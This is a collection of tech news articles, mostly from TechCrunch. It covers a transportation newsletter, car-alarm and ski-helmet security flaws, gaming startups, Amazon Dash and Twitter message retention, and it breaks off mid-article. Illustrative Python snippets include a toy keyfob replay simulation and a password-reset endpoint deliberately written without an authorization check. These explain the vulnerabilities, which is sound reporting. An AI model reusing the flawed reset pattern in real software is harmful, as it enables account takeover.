Transportation Weekly: Waymo unleashes laser bear, Bird spreads its wings, Lyft tightens its belt

Welcome back to Transportation Weekly; I’m your host Kirsten Korosec, senior transportation reporter at TechCrunch. This is the fifth edition of our newsletter and we love the reader feedback. Keep it coming.

Never heard of TechCrunch’s Transportation Weekly? Catch up here, here and here. As I’ve written before, consider this a soft launch. Follow me on Twitter @kirstenkorosec to ensure you see it each week. (An email subscription is coming.)

This week, we explore the world of light detection and ranging sensors known as LiDAR, young drivers, trouble in Barcelona, autonomous trucks in California, and China among other things.


ONM …

There are OEMs in the automotive world. And here, (wait for it) there are ONMs — original news manufacturers. (Cymbal crash!) This is where investigative reporting, enterprise pieces and analysis on transportation live.

This week, we’re going to put on our analysis hats as we explore the world of LiDAR, a sensor that measures distance using laser light to generate highly accurate 3D maps of the world around the car. LiDAR is considered by most in the self-driving car industry (Tesla CEO Elon Musk being one exception) to be a key piece of technology required to safely deploy robotaxis and other autonomous vehicles.

There are A LOT of companies working on LiDAR. Some counts track upwards of 70. For years now, Velodyne has been the primary supplier of LiDAR sensors to companies developing autonomous vehicles. Waymo, back when it was just the Google self-driving project, even used Velodyne LiDAR sensors until 2012.

Dozens of startups have sprung up with Velodyne in their sights. But now Waymo has changed the storyline.

To catch you up: Waymo announced this week that it will start selling its custom LiDAR sensors — the technology that was at the heart of a trade secrets lawsuit last year against Uber.

Waymo’s entry into the market doesn’t necessarily upend other companies’ plans. Waymo is going to sell its short-range LiDAR, called Laser Bear Honeycomb, to companies outside of self-driving cars. It will initially target robotics, security and agricultural technology.

It does put pressure on startups, particularly those with less capital or those targeting the same customer base. Pitchbook ran the numbers for us to determine where the LiDAR industry sits at the moment. There are two stories here: there are a handful of well-capitalized startups, and we may have reached “peak” LiDAR. Last year, there were 28 VC deals in LiDAR technology valued at $650 million. The number of deals was slightly lower than in 2017, but the total value jumped by nearly 34 percent.

The top global VC-backed LiDAR technology companies (by post valuation) are Quanergy, Velodyne (although mostly corporate backed), Aurora (not self-driving company Aurora Innovation), Ouster, and DroneDeploy. The graphic below, also courtesy of Pitchbook, shows the latest figures as of January 31, 2019.

Dig In

Researchers discovered that two popular car alarm systems had server-side API vulnerabilities that could be abused to take control of an alarm system’s user account, and with it the vehicle.

The companies — Russian alarm maker Pandora and California-based Viper (or Clifford in the U.K.) — have fixed the security vulnerabilities that allowed researchers to remotely track, hijack and take control of vehicles with the alarms installed. What does this all mean?

Our in-house security expert and reporter Zack Whittaker digs in and gives us a reality check. Follow him @zackwhittaker.

The first widely publicized car hack, in 2015, proved hijacking and controlling a car was possible, and it opened the door to understanding the wider threat to modern vehicles.

Most modern cars have internet connectivity, making their baseline attack surface far greater than that of a car without it. But remotely controlling a vehicle takes difficult and convoluted work, and the attack — often done by chaining together a set of different vulnerabilities — can take weeks or even longer to develop.

Keyfob replay attacks are far more likely than, say, remote attacks over the internet or cell network. A keyfob sends an “unlock” signal; a nearby device captures that signal and replays it. By replaying it, an attacker can unlock the car.
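To make the mechanics concrete, here is a minimal, self-contained sketch of why a fixed-code fob falls to a simple replay; the "car," the "signal" and the rolling-code remark are toy stand-ins, not any vendor's actual protocol.

```python
# Toy illustration of a replay attack against a fixed-code fob.
# Hypothetical model for demonstration only.

class FixedCodeCar:
    """Unlocks whenever it hears its single, static unlock code."""
    def __init__(self, code: bytes):
        self.code = code

    def receive(self, signal: bytes) -> bool:
        return signal == self.code  # no freshness or rolling-code check

car = FixedCodeCar(code=b"\xde\xad\xbe\xef")

# 1. The owner presses the fob; an attacker's radio captures the raw signal.
captured_signal = b"\xde\xad\xbe\xef"

# 2. Later, the attacker replays the captured bytes verbatim.
print(car.receive(captured_signal))  # True: the car unlocks for the replay

# Rolling-code fobs blunt this by including a counter the car accepts only
# once, so a captured signal is already stale when it is replayed.
```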

This latest car hack, featuring flawed third-party car alarms, was far easier to exploit, because the alarm systems added a weakness to the vehicles that wasn’t there to begin with. Car makers, with vast financial and research resources, do a far better job of securing their vehicles than the small companies that focus on functionality over security. For now, the bigger risk comes from third parties in the automobile space, but the car makers can’t afford to drop their game either.


A little bird …

We hear a lot. But we’re not selfish. Let’s share.


The California Department of Motor Vehicles is the government body that regulates autonomous vehicle testing on public roads. The job of enforcement falls to the California Highway Patrol.

In an effort to gauge the need for more robust testing guidelines, the California Highway Patrol decided to hold an event at its headquarters in Sacramento. Eight companies working on autonomous trucking technology were invited. It was supposed to be a large event with local and state politicians in attendance. And it was supposed to validate autonomous trucking as an emerging industry.

There’s just one problem: only one AV trucking company is willing and able to complete the course. We hear that startup has already gone ahead and completed it.

The California Highway Patrol has postponed the event, for now, presumably until more companies can join.

Got a tip or overheard something in the world of transportation? Email me or send a direct message to @kirstenkorosec.


Deal of the week

Instead of highlighting one giant deal, let’s step back and take a broader view of mobility this week. The upshot: 2018 saw a decline in total investments in the sector and money moved away from ride-hailing and towards two-wheeled transportation.

According to new research from EY, mobility investments in 2018 reached $39.1 billion, down from $55.2 billion in the previous year. (The figures EY provided were through November 2018.)

Ride-hailing companies raised $7.1 billion in 2018, a 73 percent decline from the previous year when $26.7 billion poured into this sector.

Investors, it seems, are shifting their focus to other business models, notably first- and last-mile connectivity. EY estimates $7 billion was invested in two-wheeler mobility companies such as bike-sharing and electric scooter services in 2018. The U.S. and China together contributed more than 80 percent of overall two-wheeler mobility investments that year, according to EY research shared with TechCrunch.

Other deals:


Snapshot

Let’s talk about Generation Z, that group of young people born from 1996 onward, and one startup that is focused on turning that demographic into car owners.

There’s lots of talk and hand wringing about young people choosing not to get a driver’s license, or not buying a vehicle. In the UK, for instance, about 42 percent of young people aged 17 to 24 hold a driver’s license. That’s about 2.7 million people, according to the National Travel Survey 2018 (NTS) from the UK government’s Department for Transport. An additional 2.2 million have a provisional or learner license. Combined, that amounts to about 13 percent of the car-driving population of the UK.

In the UK, evidence suggests that a rise in motoring costs has discouraged young people from learning to drive. And therein lies the opportunity that a new startup called Driver1 is targeting.

Driver1 is a car subscription service designed exclusively for first-car drivers aged 17 to 24. The company has been in stealth mode for about a year and is just now launching.

“The young driver market is being underserved by the car industry,” Driver1 founder Tim Hammond told TechCrunch. “And primarily it’s the financing that’s not available for that age group. It’s also something that’s not really affordable for any of the car subscription models like Fair.com and it’s not suitable for the OEM subscription services either financially or from an age perspective for young drivers.”

The company’s own research has found this group wants a newer car for 12 to 15 months.

“The car is the extension of their device,” Hammond said, noting these drivers don’t want the old junkers. “They want their iPhones and they want the car that goes with it.”

The company is working directly with leasing companies — not dealerships — to provide young drivers with 3 to 5-year-old cars that have lost 60 percent or so of their value. Driver1 is targeting under $120 a month for the customer and has a partnership with remarketing company Manheim, which is owned by Cox Automotive.

The startup is focused on the UK for now and has about 600 members who have reserved their cars for purchase. Driver1 is aiming to capture about 10 percent of the 1 million or so young people in the UK who get their learner’s permit each year. The company plans to expand to France and other European countries in the fall.


Tiny but mighty micromobility


Ca-caw, ca-caw! That’s the sound of Bird gearing up to launch Bird Platform in New Zealand, Canada and Latin America in the coming weeks. The platform is part of Bird’s mission to bring its scooters across the world “and empower local entrepreneurs in regions where we weren’t planning to launch to run their own electric-scooter sharing program with Bird’s tech and vehicles,” Bird CEO Travis VanderZanden told TechCrunch.

MRD’s two cents: Bird Platform seems like a way for Bird to make extra cash without having to do any of the work, i.e. charging the vehicles, maintaining them and working with city officials to get permits. Smart!

Meanwhile, the dolla dolla bills keep pouring into micromobility. European electric scooter startup Voi Technology raised an additional $30 million in capital. That was on top of a $50 million Series A round just three months ago.

Oh, and because micromobility isn’t just for startups, Volkswagen decided to launch a kind of weird-looking electric scooter in Geneva. Because, why not?

Megan Rose Dickey

One more thing …

Lyft is trimming staff to prepare for its IPO. TechCrunch’s Ingrid Lunden learned that the company has laid off about 50 staff in its bike and scooter division. It appears most of these folks are people who joined Lyft through its acquisition of electric bike-sharing startup Motivate, a deal that closed about three months ago.


Notable reads

It’s probably not smart to suggest another newsletter, but if you haven’t checked out Michael Dunne’s The Chinese Are Coming newsletter, you should. Dunne has a unique perspective on what’s happening in China, particularly as it relates to automotive and newer forms of mobility such as ride-hailing. One interesting nugget from his latest edition: there are more than 20 other new electric vehicle makers in China.

“Most will fall away within the next 3 to 4 years as cash runs out,” Dunne predicts.

Other quotable notables:

Here’s a fun read for the week. TechCrunch’s Lucas Matney wrote about Y Combinator startup Jetpack Aviation. The startup launched pre-orders this week for the moonshot of moonshots, the Speeder, a personal vertical take-off and landing vehicle with a svelte concept design that looks straight out of Star Wars or Halo.


Testing and deployments

Spanish ride-hailing firm Cabify is back operating in Barcelona, despite earlier dire warnings that new regulations from the local government would crush its business, force it to fire thousands of drivers and drive it out of the city forever. Turns out forever is one month.

The Catalan Generalitat issued a decree last month imposing a wait time of at least 15 minutes between a booking being made and a passenger being picked up. The policy was made to ensure taxis and ride-hailing firms are not competing for the same passengers, following a series of taxi strikes, which included scenes of violence. Our boots-on-the-ground reporter Natasha Lomas has the whole story.

Sure, Barcelona is just one city. But what happened in Barcelona isn’t an isolated incident. The early struggles between conventional taxis and ride-hailing operations might be over, but that doesn’t mean the matter has been settled altogether.

And it’s not likely to go away. Once robotaxis actually hit the road en masse — and yes, that’ll be a while — these same struggles will pop up again.

Other deployments, or, er, retreats ….

Bike share pioneer Mobike retreats to China

On the autonomous vehicle front:

China Post, the official postal service of China, and delivery and logistics company Deppon Express will begin autonomous package delivery services in April. The delivery trucks will operate on autonomous driving technologies developed by FABU Technology, an AI company focused on intelligent driving systems.


On our radar

There is a lot of transportation-related activity this month. Come find me.

SXSW in Austin: TechCrunch will be at SXSW. And there is a lot of mobility action here. Aurora CEO and co-founder Chris Urmson was on stage Saturday morning with Malcolm Gladwell. Mayors from a number of U.S. cities as well as companies like Ford and Mercedes are on the scene. Here’s where I’ll be. 

  • 2 p.m. to 6:30 p.m. (local time) March 9 at the Empire Garage for the Smart Mobility Summit, an annual event put on by Wards Intelligence and C3 Group. The Autonocast, the podcast I co-host with Alex Roy and Ed Niedermeyer, will also be on hand.
  • 9:30 a.m. to 10:30 a.m. (local time) March 12 at the JW Marriott. The Autonocast and Reilly Brennan, founding general partner of Trucks VC, will hold a SXSW podcast panel on automated vehicle terminology and other stuff.
  • 3:30 p.m. (local time) over at the Hilton Austin Downtown, I’ll be moderating a panel, Re-inventing the Wheel: Own, Rent, Share, Subscribe. Sherrill Kaplan of Zipcar, Amber Quist of Silvercar and Russell Lemmer of Dealerware will join me on stage.
  • TechCrunch is also hosting a SXSW party from 1 pm to 4 pm Sunday, March 10, at 615 Red River St., featuring musical guest Elderbrook. RSVP here

Nvidia GTC

TechCrunch (including yours truly) will also be at Nvidia’s annual GPU Technology Conference from March 18 to 21 in San Jose.

Self Racing Cars

The annual Self Racing Car event will be held March 23 and March 24 at Thunderhill Raceway near Willows, California.

There is still room for participants to test or demo their autonomous vehicles, drivetrain innovation, simulation, software, teleoperation, and sensors. Hobbyists are welcome. Sign up to participate or drop them a line at [email protected].

Thanks for reading. There might be content you like or something you hate. Feel free to reach out to me at [email protected] to share those thoughts, opinions or tips. 

See you next time.

Car alarms with security flaws put 3 million vehicles at risk of hijack

Two popular car alarm systems have fixed security vulnerabilities that allowed researchers to remotely track, hijack and take control of vehicles with the alarms installed.

The systems, built by Russian alarm maker Pandora and California-based Viper (or Clifford in the U.K.), were vulnerable to an easily manipulated server-side API, according to researchers at Pen Test Partners, a U.K. cybersecurity company. Their findings showed the API could be abused to take control of an alarm system’s user account — and their vehicle.

That’s because the vulnerable alarm systems could be tricked into resetting an account password; the API failed to check whether the request was authorized, allowing the researchers to log in.
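To illustrate the class of flaw described here, a hypothetical sketch follows; the endpoint, field names and logic are assumptions for demonstration, not Pandora’s or Viper’s actual code.

```python
# Hypothetical sketch of the flaw class: a password-reset API that never
# verifies who is asking. Not either vendor's real implementation.
from flask import Flask, request, jsonify

app = Flask(__name__)
USERS = {"victim@example.com": {"password": "original-password"}}

@app.route("/api/users/reset_password", methods=["POST"])
def reset_password():
    body = request.get_json()
    # FLAW: nothing checks that the caller is logged in as, or authorized
    # for, this account -- anyone who knows an email can set a new password.
    USERS[body["email"]]["password"] = body["new_password"]
    return jsonify({"status": "ok"})

# The fix is to demand proof of identity before honoring the request, e.g.
# validate a session token and confirm it belongs to the targeted account.
```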

Although the researchers bought alarms to test, they said “anyone” could create a user account to access any genuine account or extract all the companies’ user data.

The researchers said some three million cars globally were vulnerable to the flaws, since fixed.

In one example demonstrating the hack, the researchers geolocated a target vehicle, tracked it in real time, followed it, remotely killed the engine to force the car to stop, and unlocked the doors. The researchers said it was “trivially easy” to hijack a vulnerable vehicle. Worse, it was possible to identify some car models, making targeted hijacks of high-end vehicles even easier.

The researchers also found they could listen in on the in-car microphone, built in as part of the Pandora alarm system for making calls to emergency services or roadside assistance.

Ken Munro, founder of Pen Test Partners, told TechCrunch this was their “biggest” project.

The researchers contacted both Pandora and Viper with a seven-day disclosure period, given the severity of the vulnerabilities. Both companies responded quickly to fix the flaws.

When reached, Viper’s Chris Pearson confirmed the vulnerability has been fixed. “If used for malicious purposes, [the flaw] could allow customer’s accounts to be accessed without authorization.”

Viper blamed a recent system update by a service provider for the bug and said the issue was “quickly rectified.”

“Directed believes that no customer data was exposed and that no accounts were accessed without authorization during the short period this vulnerability existed,” said Pearson, but provided no evidence as to how the company came to that conclusion.

In a lengthy email, Pandora’s Antony Noto challenged several of the researchers’ findings, summarizing: “The system’s encryption was not cracked, the remotes were not hacked, [and] the tags were not cloned,” he said. “A software glitch allowed temporary access to the device for a short period of time, which has now been addressed.”

The research follows work last year by Vangelis Stykas on Calamp, a telematics provider that serves as the basis for Viper’s mobile app. Stykas, who later joined Pen Test Partners and also worked on the car alarm project, found the app was using credentials hardcoded in the app to log in to a central database, which gave anyone who logged in remote control of a connected vehicle.

The gaming clips service Medal has bought Donate Bot for direct donations and payments

The Los Angeles-based video gaming clipping service, Medal, has made its first acquisition as it rolls out new features to its user base.

The company has acquired the Discord-based donations and payments service Donate Bot to enable direct payments and other types of transactions directly on its site.

Now, the company is rolling out a service to any Medal user with more than 100 followers, allowing them to accept donations, subscriptions, and payments directly from their clips on mobile, web, desktop and through embedded clips, according to a blog post from company founder Pim De Witte.

For now, and for at least the next year, the service will be free to Medal users — meaning the company won’t take a dime of any users’ revenue made through payments on the platform.

For users who already have a storefront up with Patreon, Shopify, Paypal.me, Streamlabs, or Ko-fi, Medal won’t wreck the channel — it will integrate with those and other payment processing systems.

Through the Donate Bot service, any user with a Discord server can generate a donation link, which can be customized to become more of a customer acquisition funnel for teams or gamers that sell their own merchandise.

A webhooks API gives users a way to add donors to various lists, subscription services or stream overlays, and Donate Bot is directly linked with Discord Bot List and Discord Server List as well, so users can accept donations without having to set up a website.
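For a sense of how such a webhook integration typically works, here is a minimal, hypothetical receiver; the route and payload fields are assumptions, not Donate Bot’s documented schema.

```python
# Hypothetical donation-webhook receiver: each incoming event adds the donor
# to a local list that could feed a mailing list or a stream overlay.
from flask import Flask, request, jsonify

app = Flask(__name__)
donors = []

@app.route("/webhooks/donations", methods=["POST"])
def handle_donation():
    event = request.get_json()
    donors.append({
        "name": event.get("donor_name"),     # assumed field names
        "amount": event.get("amount"),
        "message": event.get("message"),
    })
    return jsonify({"received": True})
```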

In addition, the company updated its social features, so clips made on Medal can ultimately be shared on social media platforms like Twitter and Discord — and the company is also integrated with Discord, Twitter and Steam in a way to encourage easier sign-ups.

Outdoor Tech’s Chips ski helmet speakers are a hot mess of security flaws

Sometimes the “smartest” gadgets come with the shoddiest security.

Alan Monie, a security researcher at U.K. cybersecurity firm Pen Test Partners, bought and tested a pair of Chips 2.0 wireless speakers, built by California-based Outdoor Tech, only to find they’re a security nightmare.

The in-helmet speakers allow users to listen to music on the go, make calls and talk to friends through the walkie-talkie — all without having to take off their helmet. The speakers are connected to an app on your phone.

You’re probably thinking: how bad can the security be on a simple enough pair of ski helmet speakers?

According to Monie, who wrote up his findings, it’s easy to grab streams of data from the server-side API, used to communicate with the app, such as usernames, email addresses and phone numbers of anyone with an account. Monie said the API returned scrambled passwords, but that password reset codes were sent in plaintext.

Worse, it’s possible to reveal a user’s precise geolocation, and listen in on anyone’s real-time walkie-talkie conversations.

The only thing worse than the security flaws is the company’s lack of response when Monie reached out to get the issues fixed. After a short email exchange over several days, the company stopped responding, he said.

“We really like the product but its security is sorely lacking,” said Monie in his report.

It’s the latest example of many where gadget makers take little to no responsibility for the security of their hardware or software. With so many devices connected to the internet — either directly or through an app — every company has to think like a security company.

Outdoor Tech did not return a request for comment.

Amazon stops selling stick-on Dash buttons

Amazon has confirmed it’s retired physical stick-on Dash buttons from sale — in favor of virtual alternatives that let Prime Members tap a digital button to reorder a staple product.

It also points to its Dash Replenishment service — which offers an API for device makers wanting to build internet-connected appliances that can automatically reorder the products they need to function, be it cat food, batteries or washing powder — as another reason why physical Dash buttons, which launched back in 2015 (costing $5 a pop), are past their sell-by date.

Amazon says “hundreds” of IoT devices capable of self-ordering on Amazon have been launched globally to date by brands including Beko, Epson, illy, Samsung and Whirlpool, to name a few.

So why press a physical button when a digital one will do? Or, indeed, why not do away with the need to push a button at all and just let your gadgets rack up your grocery bill all by themselves while you get on with the important business of consuming all the stuff they’re ordering?

You can see where Amazon wants to get to with its “so customers don’t have to think at all about restocking” line. Consumption that entirely removes the consumer’s decision making process from the transactional loop is quite the capitalist wet dream. Though the company does need to be careful about consumer protection rules as it seeks to remove all friction from the buying process.

The ecommerce behemoth also claims customers are “increasingly” using its Alexa voice assistant to reorder staples, such as via the Alexa Shopping voice shopping app (Amazon calls it ‘hands free shopping’), which lets people tell the machine about a purchase intent and suggests items to buy based on their Amazon order history.

Albeit, it offers no actual usage metrics for Alexa Shopping. So that’s meaningless PR.

A less flashy but perhaps more popular option than ‘hands free shopping’, which Amazon also says has contributed to making physical Dash buttons redundant, is its Subscribe & Save program.

This “lets customers automatically receive their favourite items every month”, as Amazon puts it. It offers an added incentive of discounts that kick in if the user signs up to buy five or more products per month. But the mainstay of the sales pitch is convenience, with Amazon touting time saved by subscribing to ‘essentials’ — and time saved from compiling boring shopping lists once again means more time to consume the stuff being bought on Amazon…

In a statement about retiring physical Dash buttons from global sale on February 28, Amazon also confirmed it will continue to support existing Dash owners — presumably until their buttons wear down to the bare circuit board from repeat use.

“Existing Dash Button customers can continue to use their Dash Button devices,” it writes. “We look forward to continuing support for our customers’ shopping needs, including growing our Dash Replenishment product line-up and expanding availability of virtual Dash Buttons.”

So farewell then, clunky Dash buttons. Another physical push-button bites the dust. Though the plastic-y Dash buttons were quite unlike the classic iPhone home button — always seeming temporary and experimental rather than slick and coolly reassuring. Even so, the end of both buttons points to the need for tech businesses to tool up for the next wave of contextually savvy connected devices. More smarts, and more controllable smarts, is key.

Amazon’s statement about ‘shifting focus’ for Dash does not mention potential legal risks around the buttons related to consumer rights challenges — but that’s another angle here.

In January a court in Germany ruled Dash buttons breached local ecommerce rules, following a challenge by a regional consumer watchdog that raised concerns about T&Cs which allow Amazon to substitute a product of a higher price or even a different product entirely than what the consumer had originally selected. The watchdog argued consumers should be provided with more information about price and product before taking the order — and the judges agreed. Though Amazon said it would seek to appeal.

While it’s not clear whether or not that legal challenge contributed to Amazon’s decision to shutter Dash, it’s clear that virtual Dash buttons offer more opportunities for displaying additional information prior to a purchase than a screen-less physical Dash button. So are more easily adapted to meet any tightening legal requirements across different markets.

The demise of the physical Dash was reported earlier by CNET.

Polis, the door-to-door marketer, raises another $2.5 million

Polis founder Kendall Tucker began her professional life as a campaign organizer in local Democratic politics, but — seeing an opportunity in her one-on-one conversations with everyday folks — has built a business taking that shoe-leather approach to political campaigns to the business world.

Now the company she founded three years ago to test her thesis that Americans would welcome the return of the door-to-door salesperson is $2.5 million richer thanks to a new round of financing from Initialized Capital (the fund founded by Garry Tan and Reddit co-founder Alexis Ohanian) and Semil Shah’s Haystack.vc.

The Boston-based company currently straddles the line between political organizing tool and new marketing platform — a situation that even its founder admits is tenuous at the moment.

That tension is only exacerbated by the fact that the company is coming off one of its biggest political campaign seasons. Helping to power the get-out-the-vote initiative for Senatorial candidate Beto O’Rourke in Texas, Polis’ software managed the campaign’s outreach effort to 3 million voters across the state.

However, politically-focused software and services businesses are risky. Earlier this year the Sean Parker-backed Brigade shut down and there are rumblings that other startups targeting political action may follow suit.

“Essentially, we got really excited about going into the corporate space because online has gotten so nasty,” says Tucker. “And, at the end of the day, digital advertising isn’t as effective as it once was.”

Customer acquisition costs in the digital ad space are rising. For companies like NRG Energy and Inspire Energy (both Polis clients), the cost of an acquisition online can be as much as $300.

Polis helps identify which doors salespeople should target and works with companies to identify the scripts that are most persuasive for consumers, according to Tucker. The company also monitors for sales success and helps manage the process so customers aren’t getting too many housecalls from persistent salespeople.

“We do everything through the conversation at the door,” says Tucker. “We do targeting and we do script curation (everything from what script do you use and when do you branch out of scripts) and we have an open API so they can push that out and they run with it through the rest of their marketing.”

 

Medal.tv’s clipping service allows gamers to share the moments of their digital lives

As online gaming becomes the new social forum for living out virtual lives, a new startup called Medal.tv has raised $3.5 million for its in-game clipping service to capture and share the Kodak moments and digital memories that are increasingly happening in places like Fortnite or Apex Legends.

Digital worlds like Fortnite are now far more than just a massively multiplayer gaming space. They’re places where communities form, where social conversations happen, and where, increasingly, people are spending the bulk of their time online. They even host concerts — like the one from EDM artist Marshmello, which drew (according to the DJ himself) roughly 10 million players onto the platform.

While several services exist to provide clips of live streams from gamers who broadcast on platforms like Twitch, Medal.tv bills itself as the first to offer clipping services for the private games that more casual gamers play among friends and far-flung strangers around the world.

“Essentially the next generation is spending the same time inside games that we used to playing sports outside and things like that,” says Medal.tv’s co-founder and chief executive, Pim DeWitte. “It’s not possible to tell how far it will go. People will capture as many if not more moments for the reason that it’s simpler.”

The company marks a return to the world of gaming for DeWitte, a serial entrepreneur who first started coding when he was 13 years old.

Hailing from a small town in the Netherlands called Nijmegen, DeWitte first reaped the rewards of startup success with a gaming company called SoulSplit. Built on the back of his popular YouTube channel, the SoulSplit game was launched with DeWitte’s childhood friend Iggy Harmsen and fellow online gamer Josh Lipson, who came on board as SoulSplit’s chief technology officer.

At its height, Soulsplit was bringing in $1 million in revenue and employed roughly 30 people, according to interviews with DeWitte.

The company shut down in 2015 and the co-founders split up to pursue other projects. For DeWitte that meant a stint working with Doctors Without Borders on an app called MapSwipe that would use satellite imagery to better locate people in the event of a humanitarian crisis. He also helped the non-profit develop a tablet that could be used by doctors deployed to treat Ebola outbreaks.

Then in 2017, as social gaming was becoming more popular on games like Fortnite, DeWitte and his co-founders returned to the industry to launch Medal.tv.

It initially started as a marketing tool to get people interested in playing the games that DeWitte and his co-founders were hoping to develop. But as the clipping service took off, DeWitte and co. realized that they potentially had a more interesting social service on their hands.

“We were going to build a mobile app and were going to load a bunch of videos of people playing games and then we’re going to load videos of our games,” DeWitte says. 

The service allows users to capture the last 15 seconds of gameplay using different recording mechanisms based on game type. Medal.tv captures gameplay on a device and users can opt-in to record sound as well.

“It is programmed so that it only records the game,” DeWitte says. “There is no inbound connection. It only calls for the API [and] all of the things that would be somewhat dangerous from a privacy perspective are all opt-in.”
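The “last 15 seconds” style of capture is typically built on a rolling buffer; below is a minimal sketch of that idea, with stand-in frame handling rather than Medal’s actual implementation.

```python
# Rolling-buffer sketch: keep only the most recent frames in memory and
# snapshot them when the user hits the clip hotkey. Frame capture and
# encoding are stand-ins for illustration.
from collections import deque

FPS = 60
CLIP_SECONDS = 15
frames = deque(maxlen=FPS * CLIP_SECONDS)  # older frames fall off automatically

def on_new_frame(frame: bytes) -> None:
    frames.append(frame)        # called for every captured game frame

def on_clip_hotkey() -> list:
    return list(frames)         # the last ~15 seconds, ready to encode and share
```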

 

There are roughly 30,000 users on the platform every week and around 15,000 daily active users, according to DeWitte. Launched last May, the company has been growing between 5% and 10% weekly, according to DeWitte. Typically, users are sharing clips through Discord, WhatsApp and Instagram direct messages, DeWitte said.

In addition to the consumer-facing clipping service, Medal also offers a data collection service that aggregates information about the clips shared by Medal’s users so game developers and streamers can get a sense of how clips are being shared and across which platforms.

“We look at clips as a form of communication and in most activity that we see, that’s how it’s being used,” says DeWitte.

But that information is also valuable to esports organizations to determine where they need to allocate new resources.

“Medal.tv Metrics is spectacular,” said Peter Levin, Chairman of the Immortals esports organization, in a statement. “With it, any gaming organization gains clear, actionable insights into the organic reach of their content, and can build a roadmap to increase it in a measurable way.”

The activity that Medal was seeing was impressive enough to attract the attention of investors led by Backed VC and Initial Capital. Ridge Ventures, Makers Fund, and Social Starts, all participated in the company’s $3.5 million round as well, with Alex Brunicki, a founding partner at Backed, and Matteo Vallone, principal at Initial, joining the company’s board.

“Emerging generations are experiencing moments inside games the same way we used to with sports and festivals growing up. Digital and physical identity are merging and the technology for gamers hasn’t evolved to support that,” said Alex Brunicki, partner at Backed.vc, in a statement.

Medal’s platform works with games like Apex Legends, Fortnite, Roblox, Minecraft and Oldschool Runescape (where DeWitte first cut his teeth in gaming).

“Friends are the main driver of game discovery, and game developers benefit from shareable games as a result. Medal.tv is trying to enable that without the complexity of streaming,” said Vallone, who previously headed up games for Google Play Europe, and now sits on the Medal board.

 

Even years later, Twitter doesn’t delete your direct messages

When does “delete” really mean delete? Not always or even at all if you’re Twitter.

Twitter retains direct messages for years, including messages you and others have deleted, but also data sent to and from accounts that have been deactivated and suspended, according to security researcher Karan Saini.

Saini found years-old messages in a file from an archive of his data obtained through the website, including from accounts that were no longer on Twitter. He also filed a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve direct messages even after a message was deleted from both the sender and the recipient — though the bug wasn’t able to retrieve messages from suspended accounts.

Saini told TechCrunch that he had “concerns” that the data was retained by Twitter for so long.

Direct messages once let users “unsend” messages from someone else’s inbox, simply by deleting it from their own. Twitter changed this years ago, and now only allows a user to delete messages from their own account. “Others in the conversation will still be able to see direct messages or conversations that you have deleted,” Twitter says in a help page. Twitter also says in its privacy policy that anyone wanting to leave the service can have their account “deactivated and then deleted.” After a 30-day grace period, the account disappears, along with its data.

But, in our tests, we could recover direct messages from years ago — including old messages that had since been lost to suspended or deleted accounts. By downloading your account’s data, it’s possible to download all of the data Twitter stores on you.

A conversation, dated March 2016, with a suspended Twitter account was still retrievable today. (Image: TechCrunch)
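For those who want to poke at their own archive, here is a rough sketch of pulling direct messages out of the download; the file path and field names are assumptions based on the archive layout at the time and may differ between archive versions.

```python
# Sketch of inspecting direct messages in a downloaded Twitter archive.
# Assumes a data/direct-messages.js file holding a JSON array assigned to a
# window.YTD.* variable; field names are assumptions and may vary.
import json
import pathlib

raw = pathlib.Path("twitter-archive/data/direct-messages.js").read_text(encoding="utf-8")
conversations = json.loads(raw[raw.index("["):])  # strip the "window.YTD... = " prefix

for convo in conversations:
    for msg in convo.get("dmConversation", {}).get("messages", []):
        event = msg.get("messageCreate", {})
        print(event.get("createdAt"), event.get("text"))
```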

Saini says this is a “functional bug” rather than a security flaw, but argued that the bug allows anyone a “clear bypass” of Twitter mechanisms meant to prevent access to suspended or deactivated accounts.

But it’s also a privacy matter, and a reminder that “delete” doesn’t mean delete — especially with your direct messages. That can open up users, particularly high-risk accounts like journalists and activists, to government data demands that call for data from years earlier.

That’s despite Twitter telling law enforcement that once an account has been deactivated, there is “a very brief period in which we may be able to access account information, including tweets.”

A Twitter spokesperson said the company was “looking into this further to ensure we have considered the entire scope of the issue.”

Retaining direct messages for years may put the company in a legal grey area amid Europe’s new data protection laws, which allow users to demand that a company delete their data.

Neil Brown, a telecoms, tech and internet lawyer at U.K. law firm Decoded Legal, said there’s “no formality at all” to how a user can ask for their data to be deleted. Any request from a user to delete their data that’s directly communicated to the company “is a valid exercise” of a user’s rights, he said.

Companies can be fined up to four percent of their annual turnover for violating GDPR rules.

“A delete button is perhaps a different matter, as it is not obvious that ‘delete’ means the same as ‘exercise my right of erasure’,” said Brown. Given that there’s no case law yet under the new General Data Protection Regulation regime, it will be up to the courts to decide, he said.

When asked if Twitter thinks that consent to retain direct messages is withdrawn when a message or account is deleted, Twitter’s spokesperson had “nothing further” to add.

Fabula AI is using social spread to spot ‘fake news’

UK startup Fabula AI reckons it’s devised a way for artificial intelligence to help user generated content platforms get on top of the disinformation crisis that keeps rocking the world of social media with antisocial scandals.

Even Facebook’s Mark Zuckerberg has sounded a cautious note about AI technology’s capability to meet the complex, contextual, messy and inherently human challenge of correctly understanding every missive a social media user might send, well-intentioned or its nasty flip-side.

“It will take many years to fully develop these systems,” the Facebook founder wrote two years ago, in an open letter discussing the scale of the challenge of moderating content on platforms thick with billions of users. “This is technically difficult as it requires building AI that can read and understand news.”

But what if AI doesn’t need to read and understand news in order to detect whether it’s true or false?

Step forward Fabula, which has patented what it dubs a “new class” of machine learning algorithms to detect “fake news” — in the emergent field of “Geometric Deep Learning,” where the datasets to be studied are so large and complex that traditional machine learning techniques struggle to find purchase on this ‘non-Euclidean’ space.

The startup says its deep learning algorithms are, by contrast, capable of learning patterns on complex, distributed data sets like social networks. So it’s billing its technology as a breakthrough. (It’s written a paper on the approach, which can be downloaded here.)

It is, rather unfortunately, using the populist and now frowned upon badge “fake news” in its PR. But it says it’s intending this fuzzy umbrella to refer to both disinformation and misinformation. Which means maliciously minded and unintentional fakes. Or, to put it another way, a photoshopped fake photo or a genuine image spread in the wrong context.

The approach it’s taking to detecting disinformation relies not on algorithms parsing news content to try to identify malicious nonsense but instead looks at how such stuff spreads on social networks — and also therefore who is spreading it.

There are characteristic patterns to how ‘fake news’ spreads vs the genuine article, says Fabula co-founder and chief scientist, Michael Bronstein.

“We look at the way that the news spreads on the social network. And there is — I would say — a mounting amount of evidence that shows that fake news and real news spread differently,” he tells TechCrunch, pointing to a recent major study by MIT academics which found ‘fake news’ spreads differently vs bona fide content on Twitter.

